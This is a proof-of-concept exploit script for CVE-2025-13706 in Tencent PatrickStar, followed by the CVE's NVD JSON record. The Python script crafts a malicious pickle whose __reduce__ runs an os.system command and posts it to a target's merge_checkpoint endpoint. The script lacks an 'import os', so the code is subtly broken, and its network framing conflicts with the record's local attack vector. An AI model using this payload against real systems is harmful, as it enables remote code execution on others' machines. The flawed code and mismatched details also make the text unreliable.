CVE-2025-13706

# CVE-2025-13706 PoC - Tencent PatrickStar merge_checkpoint Deserialization RCE # This PoC demonstrates the deserialization vulnerability in merge_checkpoint endpoint import pickle import requests import sys # Malicious pickle payload that executes arbitrary command during deserialization class MaliciousPayload: def __reduce__(self): # Replace 'id' with actual command to execute cmd = "id" return (os.system, (cmd,)) def generate_exploit_payload(): """Generate malicious serialized payload""" payload = pickle.dumps(MaliciousPayload()) return payload def exploit_merge_checkpoint(target_url, payload): """Send malicious payload to merge_checkpoint endpoint""" endpoint = f"{target_url}/merge_checkpoint" headers = { 'Content-Type': 'application/octet-stream', 'User-Agent': 'Mozilla/5.0' } try: response = requests.post(endpoint, data=payload, headers=headers, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} http://target:8080") sys.exit(1) target = sys.argv[1] print(f"[*] Generating malicious payload for CVE-2025-13706...") payload = generate_exploit_payload() print(f"[*] Sending payload to {target}/merge_checkpoint...") response = exploit_merge_checkpoint(target, payload) if response: print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}")

{"cve": {"id": "CVE-2025-13706", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent PatrickStar merge_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent PatrickStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the merge_checkpoint endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27182."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Tencent/PatrickStar/commit/2384535503ea98cfe35ad04e20c0cfc7bf58d5d7", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1034/", "source": "[email protected]"}]}}